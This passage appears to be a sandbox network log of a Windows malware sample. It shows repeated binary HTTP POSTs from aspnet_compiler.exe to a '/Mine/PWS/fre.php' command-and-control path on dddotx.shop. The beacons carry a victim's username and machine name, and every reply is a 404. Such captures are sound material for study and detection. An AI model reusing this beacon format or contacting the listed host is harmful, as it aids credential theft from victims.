                  Sep 25, 2024 15:29:32.623945951 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:32 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B0UehFcoHGJpvENXvInstUHfOrGu%2BwfCQ%2FvNPjiw3qZ6B4N4fXAYBNXvmtQVLPAB0WzD3jcqkf7XvLa2kHq%2BZg7k2he0DP1jtx0Lh%2FojpxGFRGo4UENzb0h8uaCiVA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d18ed0041ef-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  60192.168.2.455936188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:32.792078972 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:32.797954082 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:33.508528948 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:33 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yAWD3b30w%2Fi21QMhcKkxdoso40gNLQlTpFADVa52xbRGhOJF8p9l2H%2B55XjRDLYp43bmUpE8CqvB62wD1uC6FgfH1M%2Fsko2TW%2Bp35jcuzH4bCGmGqVvnDNzanTk5kw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d1e7d92438a-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  61192.168.2.455937188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:33.658562899 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:33.663752079 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:34.368746996 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:34 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FnHz6aVVyPIp%2FL4wUj%2BYuwTslJMjiuEoLGWo1B5iOD1e3UtZnGXSPI48eQ%2BKChsAbxda6BNyF0UKR%2Bk7nuHESEWuVIUWgPXiw0MGgM6VZNAcFvJq8spmYEIkbuxOdg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d23ddc40c90-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  62192.168.2.455938188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:34.514517069 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:34.519787073 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:35.193804026 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:35 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mV1Fb723itILU95SlMngf6iW8Xl5jyKV1tBrLOPFcHiXGsyBRHoN2nmwjrFoG8HcO1bcbBvmgk%2FRcW02EuzvU1gAZv%2FKUMXV8mMdTEWmT8EsmoDH%2FISHM4Z5%2BZbq3g%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d295bdd42f8-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  63192.168.2.455939188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:35.347440004 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:35.353458881 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:36.042773962 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:35 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oYfbhEoHVCAojQNhIxycqgCkGHXKbNViPzFkztkB0gXI34b0uQVa2VrwsGKyHYXr3usWGybs0OaqHAs8Sqzg84ehPA0rgPlw%2Bsbd%2FMfHpPEP2fIOtoN%2Bv3%2FogE4JPA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d2e8bb90f81-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  64192.168.2.455940188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:36.187341928 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:36.192349911 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:36.930238008 CEST565INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:36 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AtZh7toPRDn9Iz8XFhxn%2FqKpZRx0ZpvjuTYXMe7RjKzMKFdemdNSzZKIGZGv3d2ssbPCiblQxQCUHGqAxmWWimyUFipY9yhMxrFSfX%2F6Z1xmlEGJ0na6LgdIs2VJ1Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d33c9637cf6-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  65192.168.2.455941188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:37.112823009 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:37.117851973 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:37.927221060 CEST571INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:37 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jVLO9gffFw513TPURJE3Pi%2BZ06oH96G%2BQ6n2jhJkP3B4w%2BaoEcSkz3uA57eQ2CMeaFweVrD%2FDdBOhzZaKyjJpTaNXwZ%2F7zl1HK0PsQxO2rdAFmUL6hNqTGq5sXW2QA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d3999f441ac-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  66192.168.2.455942188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:38.093724966 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:38.099927902 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:38.890101910 CEST567INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:38 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yR1fAnjIXCDwKIhdwof3JKV3wjGOrkPaWjYmwdeku1uPo%2FyaHfcvtwpAQtL5v9P6KSMZzvwlQZf%2FmNcwVFP%2FQ3N4rAmARZoSQp7nnfsU5fU4bzXqzEU2Hswk6EGVYw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d3f9b34185d-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  67192.168.2.455943188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:39.054641008 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:39.059740067 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:39.760343075 CEST565INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:39 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d6BltilIzWT2n5%2Fcczdxexz4WKwAWaj05OMjCAHXqaE4GPGO8mPFd%2F7LAT3UAaF5Iz8S0G5Osqnem9ijYHOVEC7FRK63DxuaYSmlG5ikTZpZ0fbDeE0p1krgj7xx2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d459e3817e5-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  68192.168.2.455944188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:39.923233032 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:39.928783894 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:40.653837919 CEST573INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:40 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=apMp82T0nO9ffR7XuIugPgbj9Un0RMcWQLvhM0%2BosPxdqiks%2B7kR6iEWlfYP98C8JoeRwdv8YOHZhrPp8%2Fz1mLprledk3zcNvT8ujZdCt0m%2Bm5rTtkSF3Us%2BWnB%2B0w%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d4b1882c33f-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  69192.168.2.455945188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:40.803019047 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:40.808146954 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:41.471640110 CEST577INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:41 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5u1pODR0QjiV%2B%2F8LsODk0VD%2Fxz3hDm%2FIEw7G7obB6N4HUCw6T42F94pZz2IiBCwZL%2FYrZp%2BqwovxvPOe2Xb0OAowxBbZABJE9SvQNYhdJiS3v%2B5kb%2FNGGnr21BDeZQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d509b765e67-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  70192.168.2.455946188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:41.633367062 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:41.638242960 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:42.305742025 CEST571INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:42 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zdQbfRDMtURdtBogAg2xNyHD%2FQfsu4V%2BUoct7ZaUFPRmSSfbxbXRQmD%2ByNmlmbfGmNJLhiiuKA8wTbQkF6u7TlA5Y%2BkVgODQmiAI12TLo2D4KfkT3O7%2BoyiVaHzqtA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d55cf8b19ff-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  71192.168.2.455947188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:42.470592976 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:42.475610971 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:43.162539959 CEST567INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:43 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xiRZXFd1kQXkqEB3CsQG%2FgDKP3%2BGAk7ina8dqMfOhgtQul25Tp34GvZN71T0UDIFLmbO8ba6Z7kjnDXV4zojnk5Kbdg03eSmQOxSqmG4QTNE%2BTqqIg3BNzgciCY0pg%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d5afc6b0f6b-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  72192.168.2.455948188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:43.320044994 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:43.324953079 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:44.096743107 CEST569INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:44 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OwUihD4zXVViEAIVhfOFNeVCf0rAxkL2UVcFJbs%2F1HmMYIVkR8o0nmHv2z49G5AAHZeCY%2BV5XLIqD7uwNmVKG6l5TGHux%2B1C%2B0xcXCi2yzH4sQT61KXCUGg5Q29Klw%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d606d1e15af-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  73192.168.2.455949188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:44.258714914 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
                  Content-Encoding: binary
                  Content-Key: 925F43C2
                  Content-Length: 149
                  Connection: close
                  Sep 25, 2024 15:29:44.263622046 CEST149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 33 00 34 00 33 00 34 00 39 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                  Data Ascii: (ckav.rujones134349JONES-PC0FDD42EE188E931437F4FBE2C
                  Sep 25, 2024 15:29:45.056214094 CEST571INHTTP/1.1 404 Not Found
                  Date: Wed, 25 Sep 2024 13:29:45 GMT
                  Content-Type: text/html; charset=UTF-8
                  Connection: close
                  Status: 404 Not Found
                  CF-Cache-Status: DYNAMIC
                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=N6w7HtWiY8yjlEhG6rgWDfFtWZmVjqJZGUeKQ08TYNg4Z31nQbkAyoU0JOJG7fboiLhOg5OPkbOvFyQpZLq%2BJLAAKViKyNPushfZc64%2B%2BsTIOVRO2SJrd%2Fidq%2FzEHA%3D%3D"}],"group":"cf-nel","max_age":604800}
                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                  Server: cloudflare
                  CF-RAY: 8c8b5d66294a17c1-EWR
                  Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                  Data Ascii: File not found.


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  74192.168.2.455950188.114.96.3806880C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  TimestampBytes transferredDirectionData
                  Sep 25, 2024 15:29:45.369345903 CEST240OUTPOST /Mine/PWS/fre.php HTTP/1.0
                  User-Agent: Mozilla/4.08 (Charon; Inferno)
                  Host: dddotx.shop
                  Accept: */*
                  Content-Type: application/octet-stream
